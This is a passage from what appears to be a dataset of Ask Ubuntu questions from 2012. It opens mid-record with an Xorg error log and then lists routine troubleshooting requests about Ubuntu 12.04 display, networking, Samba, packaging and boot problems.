36-ubuntu smp tue apr 10 20:39:51 utc 2012 x86_64 kernel command line : boot_image=/boot/vmlinuz-3.2.0-23-generic root=uuid=b25ab072-077d-40f1-95a4-c7fd66acd2f0 ro reboot=pci quiet splash vt.handoff=7 build date : 07 may 2012 11:43:21pm xorg-server 2:1.11.4-0ubuntu10.2 ( for technical support please see http : //www.ubuntu.com/support ) current version of pixman : 0.24.4 before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . ( == ) log file : `` /var/log/xorg.0.log '' , time : wed jun 27 12:51:45 2012 ( == ) using config file : `` /etc/x11/xorg.conf '' ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' ( ee ) nvidia ( 0 ) : no display devices found for this x screen . ( ee ) screen ( s ) found , but none have a usable configuration . fatal server error : no screens found please consult the the x.org foundation support at http : //wiki.x.org for help . please also check the log file at `` /var/log/xorg.0.log '' for additional information . ddxsiggiveup : closing log server terminated with error ( 1 ) . closing log file .
156859	libreoffice calc causes compiz to crash when scrolling on ubuntu 12.04 with latest updates	the title should pretty much sum it up . obviously the problem does not happen very often and as such is difficult to reproduce , but it has now happened to me on two occasions in one month . i 'll be happy to assist you in any way i can to fix it if somebody can do something about it . i 'm proficient in c/c++ and good at java so i may of some use . henrik
156860	how to totaly remove blank screen screensaver ?	i have no screensaver installed but when i watch movies after a while blank screen comes and i have to get up every time and move mouse to continue watching the movie . it really pisses me off . i found this command `` gsettings set org.gnome.desktop.screensaver idle-activation-enabled false '' which allegedly disables blank screen ... i put that command in once , and blank screen keeps doing its crap . i did it again , blank screen still works on its own and would not stop . did it trice , and nothing . please someone help me with this , i 'm freaking out when trying to watch a decent movie . i 'd have to mention that i once had `` xscreensaver '' installed but i removed it after awhile . do n't know if it has something to do with blank screen still work , maybe some else would know . please help !
156861	find the password for the currently connected wireless network	i want to find the password for the wireless network that i am currently connected to ( and i entered the password when connecting to the network ) . how can i do this in ubuntu ?
156863	configuring samba to allow use of cups printer	having trouble with samba printing . i have a cups printer installed on an ubuntu 11.04 server and that works great . when i try to configure samba to allow an xp machine to use the printer , it fails when printing . i can install the printer drivers for xp from the server and the printer appears in the xp printer control panels . when i try to print a test page from the xp machine i get this error in the system event log : jun 27 20:33:29 fatcontroller smbd [ 3571 ] : [ 2012/06/27 20:33:29 , 0 ] rpc_server/srv_netlog_nt.c:603 ( _netr_serverauthenticate3 ) jun 27 20:33:29 fatcontroller smbd [ 3571 ] : _netr_serverauthenticate3 : netlogon_creds_server_check failed . rejecting auth request from client james machine account james $ here 's my smb.conf file : [ global ] server string = % h ( server ) workgroup = sodor encrypt passwords = true security = user os level = 255 preferred master = yes domain master = yes local master = yes logon path = \\ % l\profile\ % u logon drive = s : logon home = \\ % l\home\ % u domain logons = yes map to guest = never guest ok = no dns proxy = no time server = yes logon script = logon.bat load printers = yes printing = cups printcap name = cups nt acl support = no interfaces = eth1 lo bind interfaces only = yes smb ports = 445 [ netlogon ] comment = net log on path = /home/samba/netlogon guest ok = no read only = yes browseable = no [ profile ] comment = user profiles path = /home/samba/profiles read only = no create mask = 0600 directory mask = 0700 browseable = no store dos attributes = yes [ printers ] comment = all printers path = /var/spool/samba browseable = yes guest ok = no printable = yes [ print $ ] comment = printer drivers path = /var/lib/samba/printers browseable = yes guest ok = no read only = yes write list = root , skizz anyone know what the problem is and how to fix it ? in addition to the above , i also get this error : jun 27 21:56:35 fatcontroller smbd [ 3571 ] : [ 2012/06/27 21:56:35 , 0 ] printing/print_cups.c:1027 ( cups_job_submit ) jun 27 21:56:35 fatcontroller smbd [ 3571 ] : unable to print file to `edward ' - client-error-not-authorized which i think is more relevant .
156864	sound not working with an sb audigy card	i got no sound on 12.04 - it 's an amd64 desktop with sb audigy card that has worked in all previous incarnations of ubuntu i have tried alsa mixer and sound settings . all volume is up and all mutes are off . i tried installing alsa drive modules and got this : e : unable to locate package linux-alsa-driver-modules-3.2.0-25-generic e : could n't find any package by regex 'linux-alsa-driver-modules-3.2.0-25-generic'
156868	glade widget color	i start to get familiar with glade and quickly but one thing i ca n't figure out . how can i set colors , e.g . background colors or label font colors ? can i do this in glade or do i have to do it in python ? thanks stefanie
156870	problem in eclipse installation in ubuntu 12.04	have tried more than dozen times to install eclipse version available in the ubuntu software center still to no avail . every time i try to install it shows error i.e . unable to install . have tried to install it using terminal as well with still the same results . after installation it refuses to run . what to do or any other packages i can use instead of eclipse . mainly trying to run java programs through eclipse . thanks for the time . am using ubuntu 12.04 on x86-64 bit architecture .
156872	multiple x screens without xinerama	is there some way to move windows between separate x screens in ubuntu 12.04 ? with 3 monitors on 2 gpus , using twinview is not an option . xinerama allows me to drag windows between all monitors , but it also means that i lose all hardware acceleration . i do n't expect to be able to drag windows between the screens and have them occupy two monitors simultaneously , but there must be some way to transfer a program while it is running . at the moment , i do n't even know how to select which monitor it will use when launched . any pointers ?
156876	which graphics card to use multiple monitors with multiple workspace	currently i use core i5 system 2320 @ 3.0ghz with x86-64 bit architecture using ubuntu 12.04 . i intend to buy a graphics card which supports to work on multiple monitors for multiple workspaces . any suggestions which graphics card to buy and how to configure my system for this ? i have already installed compiz on my system .
156878	queue manager for a laptop ?	is there a lightweight queue manager for kubuntu ? something like torque , but as i understand it - torque works for clusters only - while i want the similar thing for my laptop . the problem is - i 'd like to start a job only if the previous jobs have finished . so i need a program which will queue the jobs , and run the next one once the previous have finished .
156887	why does software centre ask for root password when the default is for root to be disabled with no password set ?	this seems odd to me . i ca n't install software using the `` friendly '' gui tool unless i input the root password but by default , my ubuntu 12.04 has root disabled with no password set . why does n't software centre use a sudo credential ? perhaps using gksudo ?
156890	how do i install ubuntu on someone 's laptop so they can customize it ?	i would like to give someone an old computer ( `` hand-me-down '' ) after installing ubuntu on it . is there a way to preinstall and/or customize it for the user so that they can do the final setup ( username , password , etc . ) themselves ?
156892	script runs when i type it into a terminal , but not when i run it from a .sh file	i wanted to run this at start-up because i like to play around with multiple des . when i run this script from a file it wo n't run docky . i have already changed the file permissions so that it is allowed to run as a program . when i type exactly this into gnome-terminal it will run docky if i am logged into gnome-classic . i wanted to run this script at startup so that docky would n't start in unity : if [ $ desktop_session == `` gnome-classic '' ] ; then docky ; fi any suggestions ? i tried writing something like firefox in the same file and it will start firefox . so when i run the following script from a file ... cd /home/user/desktop mkdir itran if [ $ desktop_session == `` gnome-classic '' ] ; then docky ; fi it makes a new file on my desktop but wo n't run docky even though if i simply copy the same code into a terminal window it runs ... with geirha 's help , i changed the script . however , now docky launches no matter what de i run , unity or gnome-classic . # ! /bin/sh if [ $ desktop_session = `` gnome-classic '' ] ; then docky fi i 've also tried $ desktop_session = `` gnome-classic '' $ desktop_session = gnome-classic '' $ desktop_session '' = gnome-classic '' $ desktop_session '' = `` gnome-classic '' to rule out the possibility that i had that part wrong .
156894	disable mount for internal hdds	i 'm fairly new to ubuntu ( i 'm using 12.04 ) and i am looking for a way to make it so that when i boot from my usb stick the internal hdds of the computer i 'm using dont mount . i would also like to know if there is a good way to force all mounts to default as read only .
156895	how to switch sound output with key shortcut	i like to switch the sound output from speaker to usb headphone with a shortcut . is there a way to accomplish this ?
156898	authentication failure !	at the time of installation i gave login password and that was the login keyring password and authentication password.. then once in user accounts- > login options in dat for password options i set as none and then i locked.. after that the passwd which i gave at the time of installation remained as login keyring passwd but wen i entered that passwd for authentication while installing some packages it 's showing authentication failure.pls try again.. so i couldnt download any packages or updates.. is there any possibilities to change/reset the authentication password.. pls help me..
156904	how to to set your squid server to listen on tcp port 8888	how to to set your squid server to listen on tcp port 8888 instead of the default tcp port 3128 , change the http_port directive as such : http_port 8888 when i write http_port 8888 i get command error .
156906	how do i get the bash debugger to work with ddd ?	ddd script.bsh does not open the script . it shows an our glass and if i want to close ddd , it says `` bash is busy '' ... i found an old message , but it did n't help . https : //lists.gnu.org/archive/html/ddd/2008-10/msg00006.html i could n't find ddd-3.3.12-test6.tar.gz , therefore i am using the ddd version from ubuntu repository . also bashdb is already installed . used apt-get install ddd bashdb . anyone able to use ddd for bash on precise ?
156908	why does my ubuntu freeze in the middle of something with a blank screen ?	i am facing a serious problem as my dell optiplex 745 loaded with ubuntu 12.04 32bit freezes with a blank screen no mouse cursor no keyboard activity in many occasions . sometimes when i open firefox , or software center , i really ca n't tell what the main problem is , but what i am certain about is it i have to do a hard reset to reboot . i tried to use a live-cd to boot but it did the same , tried the recovery console but could n't find a way to fix from there ( i am a new user ) suspected a hardware problem but windows runs flawlessly so i believe its something related to ubuntu . specs : intel celeron d 3.06 ghz 3.0 gb ram intel built in graphics q965 1 tb hdd bios phoenex 2.6.4 please help i really love ubuntu and i do n't want to go back to windows !
156909	how do i bypass the purple screen to install my graphics drivers ?	having identified a problem of lack of b43 graphics drivers which prevent me from getting beyond a purple screen i 've been advised what commands to use to fix this . but i do n't know how to access the commands to insert the install command . i ca n't open terminal in ubuntu because i ca n't get into it . i 've been told to press escape when 'grub loading ' message appears but i 've never seen such a message . whatever i press on start-up i just get the options to boot either windows or ubuntu . then loads of text ending in the error message for lack of b43 firmware . then the purple screen . can anyone help ?
156910	how to change eclipse font sizes	i 'm trying to reduce the font sizes used in eclipse . i 've read several notes talking about how to do this , but none of them have made a difference . obviously , changing it in eclipse preferences does n't do it . the common answers about using `` appearance- > fonts '' does n't work , because there is no `` fonts '' tab . i believe i saw one person say that the `` fonts '' tab is n't supposed to be there anymore . the next suggestion is to install myunity and change the font settings there . that appeared to change the fonts used in other apps , like gnome-terminal and window headers , but it still has had no effect on eclipse .
156919	restore encrypted /home partition	i need to recover my lost data . tonight i reinstalled ubuntu without formatting /home , thinking that ubuntu was enought smart to install itself without wiping the previous data in directory like downloads and so on . when the installation process started i use for the user name the same name of my previous account . the home directory encryption option was uncheckable and so i installed with the encryption . then the installation went wrong during the copy of the beginning files . i installed ubuntu again ( in another partition ) and now ubuntu ran good but i cant't mount or enter my previous home directory with all the data in it . i tried to mount it with encrypt-recovery but it just mounts the other directory empty . gparted however told me that the partition is full . i only have 50 gb on my /home partition and the partition has just 40 gb of free space . but if i navigate it with nautilus i ca n't see any of those files . can anyone help me please ?
156920	where can i find the source code to the kernel shipped in ubuntu ?	i downloaded 12.04 lts desktop and compiled kernel . loaded the new kernel but i did not get wireless . i have questions . where do i find the exact kernel source code that of my operating system and how to compile .
156921	i just downloaded gnu clisp via the synaptic manager . now how do i use it ?	so in windows , i got used to putting file names in my path variable and then using the interpreter/compiler from the commandline prompt . what 's the equivalent on ubuntu ?
156925	is there a simple , safe way to trigger a gpu lockup on a susceptible computer ?	answers to my previous question , ubuntu 12.04 froze , requiring powercycle . what should i look / grep for in the logs ? , have led me to suspect that my computer is experiencing an intermittent gpu lockup . it has been happening about once a week , usually when i am using chrome . today it happened when i was creating a diagram on lucidchart i have a dell optiplex 755 with an ati radeon hd 2400 xt and dual monitors running in xinerama mode . i am using 12.04 with the proprietary ati driver installed . when the computer locks-up , i can still ssh in . and i would like to follow the instructions on reporting this provided at https : //wiki.ubuntu.com/x/troubleshooting/freeze is there a ( safe ) way to cause a gpu lockup so that i can go ahead and file a bug , rather than waiting until it happens again ?
156927	installing at some custom location using apt-get	to install a library i do sudo apt-get install libmysqlclient-dev and it is installed at some default location . i want to install it at some location other then default location . is it possible to do so . or i can also build it from source but i am unable to find source code of this library . please help ! !
156930	10.04 notification area wireless notification wrong	i just installed 10.04 on my hp mini 110 . all worked out of the box except the wireless ( as expected ) , so i followed the plethora of forum posts and installed/activated the sta driver . this worked and i am connected to the internet but the wireless notification shows the red exclamation point over the wireless notification anyway ... does anyone know how to fix this to show the correct notification ? also , after installing the broadcom-sta-common package i did not uninstall any packages ( i read several places about blacklisting or uninstalling the b43/ssb drivers ) . so are there any unnecessary packages i should remove from synaptic due to installing the sta packages ? thank you for any advice in advance .
156931	how to install vmware workstation from dvd - but do it from the command line ?	i hope i have n't just missed it if this was asked before . i did some searching but there 's so many posts and i did n't see anything close enough to what my problem is . i need to install vmware workstation 8 ( for linux of course ) from the command line . problem is , the software is on a dvd disk and all i 've ever had to use is `` sudo apt-get install ... '' or manually from a tar.gz . can someone guide me how to do this ? oh , in case you 're wondering , my host is ubuntu 12.04 server . it 's a light weight install that really only has the command line , awesome window manager , and xdm . i 'm trying to avoid installing gnome or any dm like that so i can stay light weight with it . also , here 's some more information about the package i need to install . it 's in a zip file to begin with . if i extract that , here 's some info i get from the file 's properties in nautilus ( from my other computer that has nautilus ) . name : vmware-workstation-full-8.0.4-744019.x86_64.bundle type : shell script ( application/x-shellscript ) thanks
156932	how do i configure the default applications on the launcher on a livecd ?	how can one edit unity bar default apps within a livecd ? in other words if you boot ubuntu 12.04 livecd you will see in the unity bar , firefox , libreoffice , ubuntu software center , etc . well i need to customize a 12.04 livecd so that upon boot you will see my own selected apps ie : chromium , ubuntu-tweak , etc . please dont link me to remastersys or myunity or ubuntu-tweak or ccsm . no graphical applications to be used . the iso is being built via chroot meaning i need the actual file ( s ) location : /usr/share/unity-2d ... ..something along those lines .
156936	12.04 ubuntu software center wo n't download when i click install	tried all the fixes here to no avail . ubuntu software center opens fine , but when i attempt to click the install button for any of the programs , no authentication pops up ( as it does on my other 12.04 install ) and nothing downloads . it flashes installing and then stops . under the edit menu i can not alter the checkmarks on tabs such as ubuntu software and downloadable from the internet . it lets me click the check mark and turns it right back off again . apt-get from terminal works fine for the same programs . it seems like my permissions were locked somehow , but i do n't know what directory it wants to download into and do n't know how to fix it . do i need to run software center as a super user ? this was an upgrade from 11.10 if that matters .
156939	consoles in ubuntu and automatic upgrade	so i recently discovered that ubuntu is simultaneously running 6 consoles in addition to the gui that everybody uses , which can be accessed by pressing ctrl+alt+f1 ... +f6 and then the default gui with ctrl+alt+f7 . what use can these consoles have when i can just open a terminal in the gui mode ? also , why is having consoles like this advantageous for computer users ; would n't a gui be much more simplistic ? also , running the console told me that i was running a development version of ubuntu quantal which is version 12.10 . the login screen ( correctly ? ) says that i 'm running 12.04 lts . what does that mean ? thanks everybody !
156940	how do i get updates for purchased applications ?	so for many of the apps in the software center they are feature frozen . do paid apps get feature updates and how is that handled - does canonical have to review them first ?
156942	err : processtart_wineboot failed to start wineboot , err 1359	installed wine from the software center and kept getting errors when trying to load windows programs . uninstalled and did the apt-get installation of the latest version ( 1 . 5 . 7 ) ran wine configuration and get a `` failed to connect to the mount manager , the drive configuration can not be edited '' if i try to install a program it immediately goes to `` internal error '' . ran winecfg and got the following : getting server_pid from lock 2457 wine : can not get pid from lock ( lock is n't locked ) err : processtart_wineboot failed to start wineboot , err 1359 p11-kit : could n't load module : /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so : /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so : can not open shared object file : no such file or directory getting server_pid from lock 2457 wine : can not get pid from lock ( lock is n't locked ) err : winecfg : winmain failed to restart 64-bit l '' c : \\windows\\system32\\winecfg.exe '' , err 1359 getting server_pid from lock 2457 wine : can not get pid from lock ( lock is n't locked )
156944	failure to boot windows 7 after ubuntu install	my computer is a ( brand new ) pc notebook , without a cd drive running windows 7 . i followed this page to install from usb : https : //help.ubuntu.com/community/installation/fromusbstickquick the installation went well and i am using ubuntu now ( v. 12.04 i believe ) i want to be able to dual boot ubuntu and win7 the problem is that the disc partitioning during the linux install caused a problem with windows , caused some problem with windows , and windows can no longer boot when i choose it at the gnu grub screen . when i restart my computer i can successfully boot linux , but not windows 7 . at the grub screen - if i run win7 normally , it freezes , shows a blue screen , and returns back to grub - if i run win7 recovery , i dont know how to access the files that i need in order to run windows again , so nothing helpful happens . can you please tell me what i would need to do ( or link a guide ) in order to run windows again . ( windows and linux is preferable , but if thats impossible going back to only windows will help too ) im guessing the easiest thing to do is just to reinstall both os , or is there anyway to undo the partition i made during the install ? thanks
156947	how to enlarge the text input field size in empathy ?	is there any way to change the default text input field size in empathy windows ? i mean , have two or three rows from default , instead of one ...
156949	where can i download quantal 12.10 alpha 2 ?	i can not download the image through the link https : //wiki.ubuntu.com/quantalquetzal/technicaloverview/alpha2 the error is `` the requested url /releases/quantal/alpha-2/ was not found on this server . ''
156952	does the amd sempron 140 cpu support 64-bit ubuntu ?	few days earlier i had completely shifted to ubuntu ( frm windows ) . i had downloaded a 64-bit version , but i think mine pc will not support it.. it is installed and working properly . mine specs is as follows : amd sempron 140 1 gb ram ( here is da problem : ( ) 320gb sata so should i install a 32-bit version or i should carry on with current one ?
156957	after upgrading from 11.10 to 12.04 i do n't have ethernet connection , how to solve it ?	i had a wired network connection that worked fine in ubuntu 11.10 . i upgraded to 12.04 and immediately after the upgrade was completed , the os reported my cable unplugged . it was not unplugged and was not defective . i have a d-link dfe-530txs 10/100 ethernet nic and i see what seems to be the generic 10050 driver loaded . is there any way to just flush anything and everything to do with the network configuration and have ubuntu reset/find everything again ? if not , is there any way , i can get it to realize that my network cable is not unplugged ? ( considering it worked mere minutes before ) .
156960	can not install banshee due to unmet dependencies	i am trying to install banshee from the ubuntu software center after installing vlc and clementine , but i 'm running into errors : i tried installing from terminal but got this : building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies . banshee : depends : libglib2.0-0 ( > = 2.32.3 ) but 2.32.1-0ubuntu2 is to be installed recommends : banshee-extension-soundmenu ( = 2.4.1-3ubuntu1~precise1 ) but it is not going to be installed e : unable to correct problems , you have held broken packages .
156961	display problem with fresh install of 12.04	just intalled ubuntu 12.04 from cd and install went with no problems . after rebooting , i get the initial purple screen and then a black screen with mouse pointer and a few stray pixels at the bottom left of screen . occasionally during the boot process , the purple screen comes back momentarily but then back to the black screen with the mouse pointer . when i finally give up and press the power button , the purple screen returns with the shut down box visible as it is shutting down . any ideas ? i have tried adding nomodeset after quiet splash , but no change . possibly not doing it correctly , since i am somewhat of a newbie to linux .
156962	does 12.04 support the dell perc 6i raid card ?	i have a dell perc 6i raid card currently used under win 2k3 and i am going to transit to ubuntu server 12 . since dell only provides driver for ubuntu 10 server yet dell servers with this raid card are certified in ubuntu website . i am wondering if i can get this raid card work under ubuntu server 12 . does anybody have similiar problems ? thanks .
156972	how do i change the watermark colour in libreoffice pdf exports ?	i 'm an avid libreoffice user , and sometimes i use it to generate sensitive pdfs ( meaning , for preview purposes ; i 'm a writer ) . recently i tried the watermark feature for pdf exports , but it 's an ugly green colour that makes reading very difficult . is there a way to change the colour of the watermark ?
156976	will installing as dual-boot harm my factory restore partition ?	i have a new toshiba satellite p740 laptop running the 64-bit version of windows 7 home premium . at the moment , the machine comes with a secret partition that will restore the computer to its out-of-the-box , factory-fresh state by using a key combination at startup . if i install ubuntu alongside windows 7 on this machine , will i still be able to access the secret partition ? i 'd like to be able to restore the machine this way if i ever need to sell it or something else goes horribly wrong .
156989	unable to boot from new ssd after installing from usb	i 'm using a new ssd with nothing on it . it 's installed via usb drive , and boots from usb as well . while in ubuntu i can see the ssd and other devices . when i install from the desktop ( have tried from the boot screen as well ) , system restarts . it takes me to the boot screen , select boot from first hard disk , nothing , goes right back to boot screen . when i take the usb out , it hangs on `` verifing dmi . '' if i boot onto the usb i can see the correct files located in the ssd . i have a basic knowledge of computers . give me any thing you think would help . no other os 's are loaded . gigabyte ga-k8n-sli 1gb ram amd athlon 64 x2 dual core 3800+ ocz ssd agility 3 120gb
156994	partition does not start on physical sector boundary ?	i 've one hd on my laptop , with two partitions ( one ext3 with ubuntu 12.04 installed and one swap ) . fdisk is giving me a partition 1 does not start on physical sector boundary warning . what is the cause and do i need to fix it ? if so , how ? this is sudo fdisk -l : disk /dev/sda : 750.2 gb , 750156374016 bytes 255 testine , 63 settori/tracce , 91201 cilindri , totale 1465149168 settori unită = settori di 1 * 512 = 512 byte sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes identificativo disco : 0x5a25087f dispositivo boot start end blocks id system /dev/sda1 * 63 1448577023 724288480+ 83 linux partition 1 does not start on physical sector boundary . /dev/sda2 1448577024 1465147391 8285184 82 linux swap / solaris this is sudo lshw related result : *-disk description : ata disk product : wdc wd7500bpkt-0 vendor : western digital physical id : 0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : 01.0 serial : wd-wx21cc1t0847 size : 698gib ( 750gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 signature=5a25087f *-volume:0 description : ext3 volume vendor : linux physical id : 1 bus info : scsi @ 0:0.0.0,1 logical name : /dev/sda1 logical name : / version : 1.0 serial : cc5c562a-bc59-4a37-b589-805b27b2cbd7 size : 690gib capacity : 690gib capabilities : primary bootable journaled extended_attributes large_files recover ext3 ext2 initialized configuration : created=2010-02-27 09:18:28 filesystem=ext3 modified=2012-06-23 18:33:59 mount.fstype=ext3 mount.options=rw , relatime , errors=remount-ro , user_xattr , barrier=1 , data=ordered mounted=2012-06-28 00:20:47 state=mounted *-volume:1 description : linux swap volume physical id : 2 bus info : scsi @ 0:0.0.0,2 logical name : /dev/sda2 version : 1 serial : 16a7fee0-be9e-4e34-9dc3-28f4eeb61bf6 size : 8091mib capacity : 8091mib capabilities : primary nofs swap initialized configuration : filesystem=swap pagesize=4096 these are related /etc/fstab lines : uuid=cc5c562a-bc59-4a37-b589-805b27b2cbd7 / ext3 errors=remount-ro , user_xattr 0 1 uuid=16a7fee0-be9e-4e34-9dc3-28f4eeb61bf6 none swap sw 0 0
156995	iptux always runs in background	i configured iptux to run in background by mistake . the next time when i start it always runs in back ground . i tried to reinstall and also reinstalled with synaptic . still it starts in background . thanks , kavin
156998	how do i start nautilus as root ?	i got problem with nautilus in ubuntu 12.04 lts when i run command `` gksu nautilus / '' password ask box appear and i type my super-user password , than password box is disappear and nautilus is not open . . when i try to open nautilus via normal user in command box . `` nautilus '' the folder is open up . when i try in terminal ... $ sudo nautilus i got following error $ sudo nautilus / ** ( nautilus:8523 ) : warning ** : command line `dbus-launch -- autolaunch=2c8ce9b7da2257c2609b749700000007 -- binary-syntax -- close-stderr ' exited with non-zero exit status 1 : autolaunch error : x11 initialization failed.\n could not parse arguments : can not open display : how can i fix this error..
157007	how can i make my pc faster ?	my computer is running very slow . it appears i may be running ubuntu 10.04 . please let me know how to increase it 's performance .
157009	why is ubuntu offline ( except torrents ) while windows is online ?	i am using a static wired connection . everything was perfect . but suddenly from few hours back i ca n't access any website . dropbox , ubuntu one also ca n't connect . ping request is also unsuccessful , but i can download through torrent . i am not trying torrent download and browsing at the same time . so , i think it 's not an issue about torrent using all the bandwidth . one important point is that this connection works perfectly on windows on this same pc ( my pc is dual-boot ) . i have tried the way what izx has suggested ( using `` sudo sh -c 'echo nameserver 8.8.8.8 > /etc/resolv.conf ' '' ) , but i 'm facing the same problem again . now i ca n't even ping 8.8.8.8 and google.com . though i can ping 74.125.228.2 ( which is google ip address ) i ca n't understand what 's happening and why this is happening . i 'm new in this website many rules and regulations is unknown to me . so , please do n't be bothered for my mistakes . looking forward for help from anyone . thanks to all .
157010	how do install ubuntu from a usb stick ?	when i go to the boot menu on my computer and select usb stick , the screen goes black and there comes a flickering underline . like i could write something . but i ca n't . whatever i push , nothing happens . except the printscrn/sysrq button . when i push it , mu computer beeps . i get no choose menu . nothing . i found out the usb stick is in msdos format . so what format should i use and how can i format it ? i am not a computer geek who knows everything . i 'm just a beginner . and only 16 years old . i 've got a new problem . the screen is n't black anymore . now there comes an error message : syslinux 4.04 chs 20110518 copyright ( c ) 1994-2011 h.peter anvin et al error : no configurationfile found no default or ui configuration directive found ! boot : and when i write something : boot : example could not find kernel image : example boot : why does this fail all the time ? ps . i 'm using ubuntu oneiric 11.10 .
157012	is the lenovo ideapad z570 fully compatible with 12.04 ?	i 'm looking for some notebook that will run on ubuntu perfectly . i like lenovo ideapad z570 , but i 'm not sure how it will perform on ubuntu . i heard people are complaining about wireless problems . here is full configuraion : processor intel core i5 2430m 2.4ghz - 3.0ghz chipset intel hm65 express memory 4gb ddr3 1333mhz graphics nvidia geforce gt 520m 1gb hdd 750gb sata ii wireless 802.11b/g/n , bluetooth 2.1 network adapter ethernet lan 10/100mbps ports vga , hdmi , 3x usb 2.0 , esata does anyone have experience with this model ? any problems noted ? i heard there is a test suite , how can i install it ? maybe i can boot live cd and try it myself before buying it . but , unfortunately , sometimes something works on live cd , but not when you install it . i guess critical components here are graphics and wireless . any feedback would be appreciated .
157014	how do i start xterm with a headless system ?	i 'm running ubuntu 12.04 and i want to boot directly and headless in the terminal ( no gui ) . after that i want to startx to start a program in xterm . when i boot 'headed ' , everything is working like supposed to , but : - when i boot headless , startx is not working ( no screens found ) i already tried to change xorg.conf to below , but it did n't not work : section `` device '' identifier `` vnc device '' driver `` vesa '' endsection section `` screen '' identifier `` vnc screen '' device `` vnc device '' monitor `` vnc monitor '' subsection `` display '' modes `` 1280x1024 '' endsubsection endsection section `` monitor '' identifier `` vnc monitor '' horizsync 30-70 vertrefresh 50-75 endsection how can i boot headless and still be able to run startx ? answer : adding the busid to the devices section in the xorg.conf above , fixed the problem for me . busid `` pci:1:00:1 ''
157016	adding gmail.py increases conky 's load time	i ma using gmail.py from archwiki to display new mail count in gmail . the script works fine and displays my new mail count correctly . the problem i am facing is when i restart conky after adding the above script to my conky.config conky took a little time ( arnd 4-5s ) to load and display . the reason i believe is gmail.py take sometime to fetch mail count thereby leading to conky 's delay . by delay i mean conky display 's nothing for around 4-5s when i run it . now , as soon as i remove gmail.py conky is back to normal . so , i was thinking is there any in-built feature in conky which make sure that other conky objects like cpu temp , uptime , date etc are loaded and displayed while it executes gmail.py in background and than update conky accordingly . relevant line in conky : gmail : $ { color red } $ { execpi 900 python /home/ranrag/.scripts/gmail.py } $ { color } i am using ubuntu 12.04 and openbox .
157021	how to fix an aborted 12.04 upgrade ?	i was upgrading to 12.04 when my computer froze up then crashed . it was about two thirds of the way done installing when the crash occurred , and the wireless network wont work and the track pad on my laptop no longer functions ... how do i repair/finish installing the new os version ? i dont want to have to delete then reinstall the os . ps . im dual booting with windows 7 .
157025	how to convert the time.time ( ) to normal datetime format in linux ?	i can convert the current date and time in seconds by using time.time ( ) like now = datetime.datetime.now ( ) now = time.time ( ) print ( `` the now time is '' ) + str ( now ) output the now time is 1340867411.88 is there any command to change this 1340867411.88 to current date time format ?
157026	why wo n't itunes 7 ( playonlinux ) recognized my iphone/ipod ?	i have installed itunes 7 via playonlinux and it installed fine , all of my music shows up no problem . however , whenever i plug in my iphone and ipod , itunes does not recognize the device ( making the use of itunes 7 pointless if i can not sync my music to the device ) . can anybody help me out ? ! ? thanks !
157029	how do i install 32-bit packages on a 64-bit system ?	how can i install software 32bit in my ubuntu amd64 ? and when i surfing in internet it 's says i should install lib32asound2.. someone out there please help me . i can do nothing again please help .
157032	mysql starting error	i installed lamp not so long ago and it worked fine but ever time i try start mysql server i see this thing : $ /etc/init.d/mysql start rather than invoking init scripts through /etc/init.d , use the service ( 8 ) utility , e.g . service mysql start since the script you are attempting to invoke has been converted to an upstart job , you may also use the start ( 8 ) utility , e.g . start mysql start : rejected send message , 1 matched rules ; type= '' method_call '' , sender= '' :1.20 '' ( uid=1000 pid=3137 comm= '' start mysql `` ) interface= '' com.ubuntu.upstart0_6.job '' member= '' start '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' com.ubuntu.upstart '' ( uid=0 pid=1 comm= '' /sbin/init '' ) how can i fix this ?
157033	/build folder used by pear	i 've just noticed a root directory ( /build ) which i ca n't seem to find any information for . it looks like it 's some sort of staging ground for pear ( php ) . there are only two folders of different php versions in it , and each of those has a few pear tar files i 've installed ( via the pear command line ) . i 'm really only asking this question because i find is strange pear ( and only pear ) would create its own root directory to store files . is this normal ? does ubuntu provide a /build directory for applications to use ?
157040	how to recover bad encrypted directory	i had a problem while formatting ubuntu . i tried to reinstall without formatting the home directory and with the same username . the home directory of the new installation was set to be encrypted . then the installation went wrong because of the cd . so it really never started ( stopped at coping stage ) . how ever ubuntu did encrypted the home directory but probably the procedure went wrong . by now i installed ubuntu in another partition , tried to mount with encrypted-recovery but the mounted directory in tmp was n't the directory i had before . there were just strange directories with coded name . strange fact is that the file system is not damaged : it continues to know how much data is actually stored in it . if i look with gparted or even nautilus i see 45 gb of data present on the partition . this let me think that my data are not erased but maybe hidden . moreover when i tried to mount the encrypted home directory with encrypted-recovery-personal it asked me the encryption secret . i insert nothing , just pressed enter , and the password was accepted . is there a method for removing my data ? maybe trying to re encrypt the directory ? how could i get back to the previous documents . thanks to everyone
157044	gnome fallback - menu with search	does gnome 3 fallback have gnomeshell-like menu with appsearch ? i like cardapio , but it not work as panel applet .
157045	how do i get my taskbar back ?	when i restarted my ubuntu workstation after a firefox crash , my taskbar disappeared . i 'm referring to the bar at the bottom of the screen , where the currently-open programs are displayed . also , i remember i could switch from one virtual screen to the next one there . at the very right , there was a button on it that would minimize all windows and show the desktop . what program do i need to start to get it back ? what could be the reason for this ?
157047	webcam keeps blinking for no reason	i have a microsoft lifecam vx-700 webcam , and it was working okay until yesterday when it started blinking for no reason . i have n't changed any settings , or even used it recently . and now it comes and goes , without me doing anything . could this be caused by a software update that was released recently ? i 'm running ubuntu 12.04 lts .
157049	i am trying to install a compressed package ending in .tar.gz and i am getting an error saying that it is not in the right format,	i am new to ubuntu and after doing some research i still ca n't figure what i am doing wrong . i am downloading the a package ending in .tar.gz , then i when i try to use ; tar -xvf matlab_r2011b.tar.gz ; i get the following error , gzip : stdin : not in gzip format tar : child returned status 1 tar : error is not recoverable : exiting now what am i doing wrong ?
